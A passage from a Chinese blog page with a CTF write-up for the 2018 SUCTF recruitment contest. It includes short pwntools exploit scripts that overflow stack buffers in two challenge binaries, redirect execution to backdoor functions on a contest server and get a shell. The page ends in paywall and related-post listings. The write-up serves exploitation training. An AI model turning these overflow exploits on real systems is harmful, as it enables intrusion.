2018 SUCTF招新赛

最新推荐文章于 2023-11-13 21:39:39 发布
VIP文章 最新推荐文章于 2023-11-13 21:39:39 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: CTF_WP PWN_WP RE_WP 文章标签: 2018 SUCTF招新赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/83822991
版权

PWN

1.stack

checksec一波

什么保护都没开,可还行,IDA找一波漏洞

read函数百分之百溢出

我们看到了我们喜爱的

改一下rip美滋滋

exp

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

local = 0

if local:
        cn = process('./pwn')
        bin = ELF('./pwn')
        #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        #libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
        cn = remote("43.254.3.203",10003)
        bin = ELF('./pwn')
        #libc = ELF('')


def z(a=''):
        gdb.attach(cn,a)
        if a == '':
                raw_input()

system_addr=0x0000000000400676
cn.recvuntil("============================")
cn.sendline('a'*0x28+p64(system_addr))
cn.interactive()
#local x64: main_arena = 0x3c4b20
#local x86: main_arena = 0x1b2780

结果如下

ls之后发现了一大堆文件

最后发现在home文件下有个ctf文件,flag在里面

2. basic pwn

no canary found 就还行

看到了好东西,虽然没有system,万幸有execve函数,重要的指令都在callThisFun函数中,看一下main函数

scanf函数是可以溢出的,直接改rip就好了,思路一样的

from pwn import *

#cn=process("./pwn.2")
cn=remote("43.254.3.203",10004)
execve_addr=0x0000000000401157
payload='a'*(0x110+0x08)+p64(execve_addr)
cn.sendline(payload)
cn.interactive()

3.babyarray

拖进IDA找漏洞

思路还是比较简单的,把a改成0就好了,最初是1,通过scanf覆盖

a的地址在0x601068,这里的6295712就是0x0x6010A0,偏移量是-56,-56/4=-14

exp

from pwn import *

cn=remote("43.254.3.203",10001)

cn.recvuntil("
最低0.47元/天 解锁文章
xiaoyuyulala
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
_PE_Format.pdf
03-26
_PE_Form_PE_Format.pdf_PE_Format.pdf_PE_Format.pdfat.pdf_PE_Format.pdf_PE_Format.pdf
suctf_2018_basic pwn
qq_62887641的博客
09-20 69
给出后门,ret2text。
2018 SUCTF misc GAME
ACdream
06-08 724
一道ACM博弈题,交互比较麻烦第一关:巴什博弈两人取石子,总共n个,每次拿 1 - m 个,问先手胜还是负,胜的话输出每一步策略第二关:威佐夫博弈两人取石子,总共两堆,可以从两堆里拿相同的数目,也可以从一堆中拿任意多个,问先手胜还是负,胜的话输出每一步策略先上代码吧import math ''' for k in xrange(1,10): a = int(k * (sq5 + 1) / 2) ...
[BUUCTF]PWN——suctf_2018_basic pwn
mcmuyanga的博客
02-02 528
suctf_2018_basic pwn 附件 步骤 例行检查,64位程序,开启了RELRO和NX 试运行一下程序,看看大概的情况 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157 main() s存在溢出,简单的覆盖返回地址到后门函数类型的题目 完整exp from pwn import * r=remote('node3.buuoj.cn',25779) flag_addr=0x401157 payload='a'*(0x110+8)+p6
PWN · heap | unlink | free_hook】[SUCTF 2018 招新赛]unlink
最新发布
Mr_Fmnwon的博客
11-13 259
题目对于知识点unlink还是非常裸的,很直接,思路很清晰。
BUUCTF reverse wp 41 - 50
fa1c4的blog
10-01 180
看了下主逻辑, 跟flag没啥关系, 直接shift+f12。
suctf_2018_basic
z1r0的博客
01-11 254
suctf_2018_basic 查看保护 ret2text即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28575) else: r = process(file_name) elf = ELF(file_name) def dbg()
[SUCTF2018]followme
zip471642048的博客
07-01 215
题目地址 : https://buuoj.cn/challenges#[SUCTF2018]followme
BUUCTF:[SUCTF2018]followme
末初的CSDN博客
11-12 1780
https://buuoj.cn/challenges#[SUCTF2018]followme 导出HTTP,这里大部分文件内容显示貌似再爆破admin密码 有点多,尝试整个文件夹找一下相关关键字,例如CTF、flag之类的 grep -r 'CTF' ./new/ flag{password_is_not_weak} ...
BUUCTF misc 专题(68)[SUCTF2018]single dog
tt_npc的博客
04-28 1130
看题目,single dog,下载附件 是这样一张图片,先查看属性的详情信息,并没有任何发现,将它拖入winhex查看 在底部发现了压缩包 拖入kali中分离出压缩包 打开压缩包查看 发现是一个txt 这就想到了jjencode和aaencode解密 jjencode与aaencode解密工具-jjencode解密-aaencode解密-在线工具 将文本全选进框,点击aaencode解密 得到答案SUCTF{happy double eleven} 包上...
CTF逆向-[SUCTF2018]babyre-WP-cpp简单迭代并按表输出值的爆破
serfend's blog
04-13 1953
CTF逆向-[SUCTF2018]babyre-WP-cpp简单迭代并按表输出值的爆破 来源:https://buuoj.cn/ 内容:https://github.com/hebtuerror404/CTF_competition_warehouse_2018 附件:链接:https://pan.baidu.com/s/1j-DBK5eELYR3c1L6hhB1qg?pwd=2kxh 提取码:2kxh 答案:SUCTF{Flag_8i7244980f} 总体思路 去除反调试,动调 发现没有逻辑分支,发现
[SUCTF2018]babyre
m0_46296905的博客
05-05 760
题目:[SUCTF2018]babyre C++写的64位bin文件 查找字符串定位到主函数 __int64 sub_140012460() { char *v0; // rdi __int64 i; // rcx char v3[48]; // [rsp+0h] [rbp-20h] BYREF char v4[32]; // [rsp+30h] [rbp+10h] char v5[184]; // [rsp+50h] [rbp+30h] BYREF char v6[60]; //
python类逆向总结
woshiyanfu的博客
09-28 1702
Python是解释型语言,没有严格意义上的编译和汇编过程。但是一般可以认为编写好的python源文件,由python解释器翻译成以.pyc为结尾的字节码文件。pyc文件是二进制文件,可以由python虚拟机直接运行。Python在执行import语句时,将会到已设定的path中寻找对应的模块。并且把对应的模块编译成相应的PyCodeObject中间结果,然后创建pyc文件,并将中间结果写入该文件。
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1374
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
CTF-Hgame_accuracy_writeup
qq_19917367的博客
07-29 423
把相关的代码记录一下, 方便以后使用 accuracy 石碑上的文字,究竟隐藏着怎样的秘密…… Write Up 题目给出两个文件, chars.csv dataset.csv, 简单查看之后,dataset是数据集, chars是测试集 数据集是由784个pixel, 即 28 * 28 df.iloc[:,0].unique() #array([10, 11, 12, 13, 14, 15, 1, 0, 4, 7, 3, 5, 8, 9, 2, 6]) 查看标签,共有1
[SUCTF2018]single dog
m0_66835614的博客
02-08 243
[SUCTF2018]single dog
[HgameCtf Week2 ]三道堆题总结
qq_42220888的博客
01-20 262
hgame 2023 week2
2018招新赛
sinat_36853972的博客
10-27 308
Python 题目网址内容: 一 背景知识 在《Python Pickle的任意代码执行漏洞实践和Payload构造)》[1]上看到一篇文章,文章中讲的Pickle反序列化,而题目中用的是pyyaml模块的反序列化。那么什么是序列化,什么是反序列化呢? 1.1 yaml yaml和xml、json一样,都是标记类语言,每个支持yaml格式的语言都会有自己的实现来进行yaml格式的解析,其中py...
suctf2018-noend writeup
qq_39153421的博客
03-24 220
题目 保护全开,主函数很简单,发现malloc没有检查分配失败的情况,若分配失败会返回0,接可以伪造size-1实现任意地址末位写0,为利用提供了条件。 可以看到题目size>0x7f不会被free,小于0x7f就会被free掉。 while ( 1 ) { do { memset(s, 0, 0x20uLL); read(0, s, 0x1FuLL); size = strtoll(s, 0LL, 10); buf = mall
[suctf 2019]EasySQL
09-12
[suctf 2019]EasySQL是一个SQL题目,与引用和引用中提到的设置sql_mode有关。具体来说,题目中使用了设置sql_mode=PIPES_AS_CONCAT的语句,这个设置的作用是将"||"操作符解释为字符串的连接操作符而不是或运算符。这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值